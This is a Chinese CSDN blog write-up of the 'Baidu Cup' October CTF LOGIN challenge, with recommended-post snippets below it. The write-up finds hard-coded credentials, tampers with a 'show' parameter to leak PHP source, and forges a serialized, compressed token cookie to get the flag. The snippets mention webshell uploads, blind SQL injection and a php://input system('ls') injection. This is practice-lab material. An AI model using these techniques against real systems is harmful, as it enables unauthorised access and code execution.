ctf-wp“百度杯”CTF比赛 十月场-LOGIN

最新推荐文章于 2023-10-09 15:42:03 发布
最新推荐文章于 2023-10-09 15:42:03 发布
阅读量1.1k 收藏
点赞数 1
文章标签: ctf web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/key_nothing/article/details/82885020
版权

进去题目看到一个登陆框,老规矩,看源码:
在这里插入图片描述
在这里插入图片描述
看起来好像没什么有用的信息,突然发现可以下拉。。。
在这里插入图片描述
找到test1,test1 (差点没发现T—T)
登陆:
在这里插入图片描述
出来了一个莫名其妙的东西。。
上burp抓包看看:
在这里插入图片描述
好像没有什么异常,但是仔细观察,发现返回中有个叫“show”的参数,值为零。尝试将参数show添加到请求,值改为1,看结果:
在这里插入图片描述
源码来了。

<head>
<meta charset="utf-8" />
</head>
<!-- <?php
	include 'common.php';
	$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
	class db
	{
		public $where;
		function __wakeup()
		{
			if(!empty($this->where))
			{
				$this->select($this->where);
			}
		}

		function select($where)
		{
			$sql = mysql_query('select * from user where '.$where);
			return @mysql_fetch_array($sql);
		}
	}

	if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		$db = new db();
		$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}else if($row['pass'] !== $login['pass']){
			echo 'unserialize injection!!';
		}else{
			echo "(╯‵□′)╯︵┴─┴ ";
		}
	}else{
		header('Location: index.php?error=1');
	}

?> -->(╯‵□′)╯︵┴─┴

可以看到想要echo flag,必须得满足:
$login['user'] === 'ichunqiu'
然而token是经过这样处理的:

 $login = unserialize(gzuncompress(base64_decode($requset['token'])));

所以将‘ichunqiu’经过

base64_encode(gzcompress(serialize($token)))

处理然后添加到token才能得到flag

<?php
$a = array('user'=>'ichunqiu');
$a = base64_encode(gzcompress(serialize($a)));
echo $a
?>

执行一下:
在这里插入图片描述
得到:token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
添加到cookie中发包:
在这里插入图片描述
bingo

zc01@
关注
【愚公系列】2023年06月 网络安全高级班 096.CTF黑客比赛CTF介绍和题目案例)
时光隧道
06-05 4590
1、web题目根据网页底部信息,得知这是用XYHCMS做的网站下载此CMS的源码http://www.xyhcms.com/,并进行代码审计(推荐RIPS)通过代码审计发现orderby参数存在SQL注入风险,类型为布尔盲注主机发现,扫描和识别端口服务,找到22、80、3306目录扫描,找到敏感目录,包括数据库和网站后台手工尝试登录数据库后台,修改网站账号密码利用网站账号登录网站后台,上传网站木马(shell)执行网站木马获取低权限shell,判断系统版本寻找提权方法。
百度CTF比赛 十月 Login
feng的博客
09-10 507
WP 打开环境后发现是一个登录的界面,随便试了试发现返回error。 我们f12查看一下源代码,拉到最下面发现了这个: <!-- test1 test1 --> 我以前还真没遇到过用户名和密码直接给在源码里的,而且我以为这题应该就是一个漫长的获得用户名和密码的过程,所以以为这个test1是其他的东西。之后因此进行了很多无用的尝试。。。 我们应该直接用户名和密码输入test1,就可以成功登录,但是打开却是这个东西: 看到这个我的第一反应是颜文字,因为以前碰巧接触过。但是又不是很了解,以为下一
i春秋 百度CTF比赛 十月 login
weixin_34056162的博客
12-22 246
出现敏感的信息,然后进行登录 登录成功发现奇怪的show 然后把show放到发包里面试一下 出现了源码,审计代码开始 出flag的条件要user 等于春秋 然后进行login来源于反序列化后的login 下面进行序列化 然后参数为token,可以通过post,get,cookie的方式,但是看到都是用的cookie,我就用post和get 转载于:htt...
百度十月web ---login
weixin_30245867的博客
04-08 114
首先一看的题,既然是是web类的,就要查看源码,一看,最先有一行注释,估摸着是用户名和密码 果然登录上去了,显示一段乱码,源码也没有什么东西, 那就抓一次包吧 发现响应头里边有个show:0的响应,而请求头没有,所以构造一个show:1 出现memeter.php的源文件 加了三层密,解密 出现一段base64,再看源文件,发现是cookie里边的token 直接在请求头...
百度CTF比赛 十月 -------Login
大方子
08-01 3343
============================================================= 个人收获: 1.多观察网页的源代码 2.多留意http的访问信息 3.多留意http头参数的变化 4.收获了unserialize,gzuncompress参数的认识 ================================================...
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1539
1. mysql盲注及脚本编写 2. .git泄露
PWNHUB 一新鲜赛事速达【六月内部赛】 web - login game + Misc - 伏羲八卦
ShenZ的博客
06-13 1314
PWNHUB 一新鲜赛事速达【六月内部赛】 web - login game + Misc - 伏羲八卦 给了源码,大概就是login登陆,upload上传,上传同时有解压extractFile函数 tarfile库的extractall或extract方法存在目录穿越漏洞,可以进行文件覆盖再看login路由 如果登陆的用户名为Admin,则读取config/userConfig.yaml文件,yaml.load转换为python数据类型yaml.load详情可以看看官方wiki PyYAML......
百度CTF Write up集锦 WEB
4ct10n
09-21 4万+
九月1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
CTF | CTF比赛题解分享
最新发布
hackzkaq的博客
10-09 7779
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
i春秋 “百度CTF比赛 十月 web题 Backdoor
weixin_30375247的博客
10-21 691
0x00: 打开题目,题目中告诉我们这题是文件泄露。 0x01: 通过扫描目录,发现可以扫到的有3个文件 index.php flag.php robots.txt 但是浏览flag.php它告诉我们这不是真正的flag 又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。 我们浏览这个url http://6...
ctf-wp-百度CTF比赛 2017 二月 include
key_nothing的博客
09-30 1231
考察文件包含 打开题目:发现 allow_url_include on 直接构造?path=php://input post参数&lt;?php echo system('ls');?&gt;列出文件名看看: 发现有个奇怪的文件:dle345aae.php 查看此文件内容:使用php://filter协议查看曝露出来的文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后...
wp百度2017年春秋欢乐赛
weixin_34279184的博客
06-27 315
|@0x01 小电影 |@0x02 水果宴 |@0x03 内涵图 百度”2017年春秋欢乐赛 === 第一 --- 0x01 小电影 分值:50分 类型:Misc已解答 题目:我说过这次比赛是让大家开开心心的度过的所以送给你们一个小电影 附件下载:ht去除tp://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/1yue...
ctfshow
charon145的博客
01-15 1381
第三题 抓包,获得flag
百度CTF比赛 十月 writeup
Senimo
08-17 3858
百度CTF比赛 十月 writeupMisc签到题那些年我追过的贝丝我要变成一只程序员剧情大反转challenge传说中的签到题听说是rc4算法try again表姐家的签到题泄露的数据考眼力flag格式WebLoginBackdoorGetFlagNot FoundVldEXEC登录GiftfuzzingTryHashNothing Misc 签到题 **分值:10分 题目内容: 对百度...
百度CTF比赛 十月-------EXEC
大方子
08-30 2701
=============================== 个人收获 1.命令盲注 2.vim文件泄露 3.nc的使用   ================================   题目:   查看源码出现这个,猜测为vim文件泄露 再浏览器输入.index.php.swp果然出现下载连接   我们把下载来的文件用 vim打开 vim -r ...
CTF web总结
热门推荐
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
百度CTF比赛 十月 签到题
Break-attack的博客
01-07 1054
百度CTF比赛 十月 签到题 题目内容: 对百度用时下最流行的表白 (去调戏i春秋公众号) 大声说出你的爱!!! 这我真的解不出来...看了别人的结题思路原来是要回复:百度么么哒 (0.0 这我真的猜不到),回复后得到flag。 flag:flag{baIdU_8ei_meme_D0} 总结:有的时候签到...
一道简单的CTF登录题题解
anquanniu的博客
03-06 8257
一、解题感受 这道题50分,在实验吧练习算比较高分,而且通过率只有14%,比较低的水平。 看到这两个数据,一开始就心生惬意,实在不应该呀! 也是因为心态原因,在发现test.php之后,自以为在SQL注入时只要能截断后面的SQL语句,FLAG就在user里面,尝试了一段时间SQL注入都失败后,有些急躁,然后就早早拜读了pcat大神的攻略。。。 在攻略的帮助下,顺利完成题目。 所以本文主要是在pc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值